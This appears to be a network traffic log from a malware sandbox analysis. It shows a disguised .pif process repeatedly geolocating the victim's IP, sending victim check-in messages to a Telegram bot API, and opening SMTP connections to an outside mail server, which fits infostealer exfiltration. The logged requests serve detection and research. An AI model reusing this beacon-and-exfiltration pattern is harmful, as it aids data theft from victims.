2025-01-02 15:05:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49757	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:41 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145130 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBbe6XRKKSvm%2FWv5eUVdSW1zAbY8OvuCtAhLNZOZ9rtDWsyVpXlInt1ggB9rQh%2FIcUanhJsRNLquy9OXBZH4Sl4mPr%2F2R9Svk05xQ%2BhWPtaGTgnYJgzYvFyLCaOF%2FGnvnKs4IIu5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba6124f7243ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27000&min_rtt=5887&rtt_var=15293&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=496008&cwnd=181&unsent_bytes=0&cid=4ecc13436a3d0cf3&ts=165&x=0"
2025-01-02 15:05:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49758	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:41 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145130 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbWAHeoMWKoHNakMv%2BKdoVfl%2B38oD0D2NL9YueH1jA8B1PD%2FMmqRCl8jyZfU2F0pmoDOpfxJfiF2424A3%2F7X5xe3Y%2FKSbugYKRCXh7SxSFSYfAArMWuWV7DawpU6YbRn4AQQHz4%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba6138a0c7cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2017&rtt_var=772&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1403846&cwnd=193&unsent_bytes=0&cid=33f75f14f6b46274&ts=181&x=0"
2025-01-02 15:05:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:43 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145132 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhaSerK61Ykz89dJ4%2FNtlxyBB8RUCq09gqSzYXhkoIq8ioSiuCOiB7ExUmHnRbPVvOaZABxI93xOJLSFAd235TXwbLcznCJYBD3vngu9o1GHDjgzvvsxjneFfVUquo4kYbvIdEv7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba61eab13429b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1686886&cwnd=238&unsent_bytes=0&cid=5acd162269c49cbf&ts=163&x=0"
2025-01-02 15:05:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49763	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:45 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145134 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYqaOAJDTC0DUJSb7bxUJaIFWLked4aFtDnuBEc%2Fdz30JVNXBSBm2Ff4FJ09ashvkWVMAM7UOfw%2Bx94GLHXkY%2B3gX4qqfN%2FjVWbApzq9cVLKAZoFtnStz241%2BptRM4WrKTN%2BgfSq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba62aae594271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1822&rtt_var=846&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1179321&cwnd=252&unsent_bytes=0&cid=e2e86946b18b2bfe&ts=179&x=0"
2025-01-02 15:05:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49764	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:45 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145134 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OssTL2l2kJSXHr9bCYrdT2wUymJRlMuSEZMBQ9QXsZOv497FK52kws8pCCNJJ8V%2B1eB2g%2F3UwGXVAqMAtWTn8UotcB3jf9vKGxn0PwJoP5g6eqsSuMIVJ8D%2B%2BTGi7yAsPFPNKXDr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba62c5d8f7c8e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1827&rtt_var=700&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1545791&cwnd=248&unsent_bytes=0&cid=f5799e23b0913d45&ts=142&x=0"
2025-01-02 15:05:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49765	149.154.167.220	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:46 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2004:14:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-02 15:05:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 02 Jan 2025 15:05:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-02 15:05:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49767	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:46 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 15:05:46 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145135 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YFDR%2FLnou6koJ%2BsNwSCcgciJQjfKewDk8yvQ9WwtPDytquE06ynkZbQpGecJ4uburbVKQpkD9BFJY7Vm97Z3mTcduDbqYZqXfXCy%2BA0o6sLJdxjkkQ%2FcQnZFlKJ6OHs56O5Ga9wc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba633abe919cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1960&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1449851&cwnd=248&unsent_bytes=0&cid=a4ac52ee02a271ea&ts=236&x=0"
2025-01-02 15:05:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49769	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:48 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145137 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6084H1JcBLEzjyqfmjfkjE6DVNYYitxqZhZ37lS%2BbHPECqJ4CrZ7Zih%2FVu7oapToMbgB7md9TEEGLnDC8jUrWQnHJ%2Fc8Jpvklo3Di0HhwjlqhEUxWtymGCW9VKmkODABGDfSxdW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba63d38e642c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1747&rtt_var=679&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1585233&cwnd=149&unsent_bytes=0&cid=4091bddc7ac07a81&ts=165&x=0"
2025-01-02 15:05:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49771	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:51 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:51 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145140 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NfapBwRik8rq2AOiFKWQjW0eYK8ivtmeW%2Bq%2Frq4SfeimjoFv238Zp%2BARozadFbO7PLl2iPRlzYz%2F%2BwvIll9lTF%2BkPWkfh2C41nLTIPn3GoBacrI6Zh7x11qBsdRmS8wuptzdeOjc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba6515c3a6a5e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1948&rtt_var=738&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1474003&cwnd=186&unsent_bytes=0&cid=b857d00d3657b9f2&ts=149&x=0"
2025-01-02 15:05:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49772	149.154.167.220	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:52 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2001:16:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-02 15:05:52 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 02 Jan 2025 15:05:52 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-02 15:05:52 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 2, 2025 16:05:53.565320015 CET	587	49773	208.91.198.176	192.168.2.4	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/02/25 15:05:53
Jan 2, 2025 16:05:53.565547943 CET	49773	587	192.168.2.4	208.91.198.176	EHLO 138727
Jan 2, 2025 16:05:53.717077017 CET	587	49773	208.91.198.176	192.168.2.4	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 2, 2025 16:05:53.717415094 CET	49773	587	192.168.2.4	208.91.198.176	STARTTLS
Jan 2, 2025 16:05:53.873588085 CET	587	49773	208.91.198.176	192.168.2.4	220 Ready to start TLS
Jan 2, 2025 16:05:59.436655045 CET	587	49799	208.91.198.176	192.168.2.4	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/02/25 15:05:59
Jan 2, 2025 16:05:59.436861038 CET	49799	587	192.168.2.4	208.91.198.176	EHLO 138727
